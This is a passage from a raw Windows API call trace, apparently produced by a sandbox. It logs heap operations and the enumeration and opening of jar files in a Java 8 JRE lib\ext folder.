out: hHeap=0x20000) returned 1 [0095.759] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0095.759] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0095.759] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0095.760] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0095.760] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0095.760] AreFileApisANSI () returned 1 [0095.760] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 53 [0095.760] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x75f30 [0095.760] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x75f30, cchWideChar=53 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\dnsns.jar") returned 53 [0095.760] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\dnsns.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\dnsns.jar"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8bb82c9, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8bb82c9, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8bb82c9, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x205e)) returned 1 [0095.760] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0095.760] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0095.760] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0095.760] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0095.760] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.760] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.760] FindNextFileW (in: hFindFile=0x78290, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8bb82c9, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8bb82c9, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8bb82c9, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xade4, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="jaccess.jar", cAlternateFileName="")) returned 1 [0095.760] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0095.760] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0095.760] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0095.760] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0095.760] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0095.760] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0095.760] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0095.760] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0095.760] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0095.760] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ff0 [0095.760] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0095.760] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ff0 | out: hHeap=0x20000) returned 1 [0095.760] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0095.760] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35210 [0095.760] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0095.760] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35210 | out: hHeap=0x20000) returned 1 [0095.760] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0095.760] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0095.760] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0095.760] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a368 [0095.761] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0095.761] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0095.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0095.761] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a368 | out: hHeap=0x20000) returned 1 [0095.761] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.761] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.761] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.761] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.761] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0095.761] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0095.761] AreFileApisANSI () returned 1 [0095.761] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\jaccess.jar", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\jaccess.jar", lpUsedDefaultChar=0x0) returned 55 [0095.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0095.761] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.761] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0095.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0095.761] AreFileApisANSI () returned 1 [0095.761] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 55 [0095.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6e) returned 0x75dc8 [0095.761] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x75dc8, cchWideChar=55 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\jaccess.jar") returned 55 [0095.761] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\jaccess.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\jaccess.jar"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0095.762] GetFileType (hFile=0x368) returned 0x1 [0095.762] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0095.762] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0095.762] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0095.762] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0095.763] CloseHandle (hObject=0x368) returned 1 [0095.763] AreFileApisANSI () returned 1 [0095.763] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 55 [0095.763] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6e) returned 0x75be8 [0095.763] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x75be8, cchWideChar=55 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\jaccess.jar") returned 55 [0095.763] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\jaccess.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\jaccess.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0095.763] GetFileType (hFile=0x368) returned 0x1 [0095.763] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0095.763] CloseHandle (hObject=0x368) returned 1 [0095.763] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0095.763] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0095.763] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0095.763] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0095.763] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0095.763] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0095.763] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0095.763] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0095.763] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0095.763] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0095.763] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0095.763] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0095.763] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0095.764] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0095.764] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0095.764] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0095.764] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0095.764] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0095.764] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0095.764] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0095.764] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0095.764] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0095.764] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0095.764] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0095.764] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0095.764] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0095.764] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0095.764] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0095.764] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0095.764] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0095.764] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0095.764] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0095.764] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0095.764] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0095.764] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0095.764] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0095.764] AreFileApisANSI () returned 1 [0095.764] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 55 [0095.764] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6e) returned 0x75e40 [0095.764] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x75e40, cchWideChar=55 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\jaccess.jar") returned 55 [0095.764] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\jaccess.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\jaccess.jar"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8bb82c9, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8bb82c9, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8bb82c9, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xade4)) returned 1 [0095.764] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75e40 | out: hHeap=0x20000) returned 1 [0095.764] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0095.764] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0095.764] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0095.764] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.764] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.764] FindNextFileW (in: hFindFile=0x78290, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8bb82c9, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8bb82c9, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c0476d, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x1166a99, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="jfxrt.jar", cAlternateFileName="")) returned 1 [0095.765] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0095.765] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0095.765] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0095.765] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0095.765] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0095.765] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0095.765] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0095.765] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0095.765] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0095.765] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350b0 [0095.765] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0095.765] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350b0 | out: hHeap=0x20000) returned 1 [0095.765] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0095.765] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f50 [0095.765] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0095.765] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f50 | out: hHeap=0x20000) returned 1 [0095.765] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0095.765] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0095.765] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0095.765] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a828 [0095.765] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0095.765] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0095.765] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0095.765] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a828 | out: hHeap=0x20000) returned 1 [0095.765] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.765] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.765] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.765] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.765] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0095.765] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0095.765] AreFileApisANSI () returned 1 [0095.765] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\jfxrt.jar", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\jfxrt.jar", lpUsedDefaultChar=0x0) returned 53 [0095.765] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0095.765] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.765] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.765] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0095.766] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0095.766] AreFileApisANSI () returned 1 [0095.766] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 53 [0095.766] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x75eb8 [0095.766] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x75eb8, cchWideChar=53 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\jfxrt.jar") returned 53 [0095.766] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\jfxrt.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\jfxrt.jar"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0095.766] GetFileType (hFile=0x368) returned 0x1 [0095.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0095.766] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0095.766] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0095.766] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0095.767] CloseHandle (hObject=0x368) returned 1 [0095.767] AreFileApisANSI () returned 1 [0095.767] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 53 [0095.767] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x76278 [0095.767] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x76278, cchWideChar=53 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\jfxrt.jar") returned 53 [0095.767] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\jfxrt.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\jfxrt.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0095.767] GetFileType (hFile=0x368) returned 0x1 [0095.767] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0095.767] CloseHandle (hObject=0x368) returned 1 [0095.767] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0095.767] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0095.767] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0095.767] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0095.767] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0095.767] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0095.767] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0095.767] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0095.767] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0095.767] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0095.767] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0095.767] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0095.768] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0095.768] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0095.768] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0095.768] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0095.768] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0095.768] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0095.768] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0095.768] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0095.768] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0095.768] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0095.768] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0095.768] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0095.768] RtlAllocateHeap 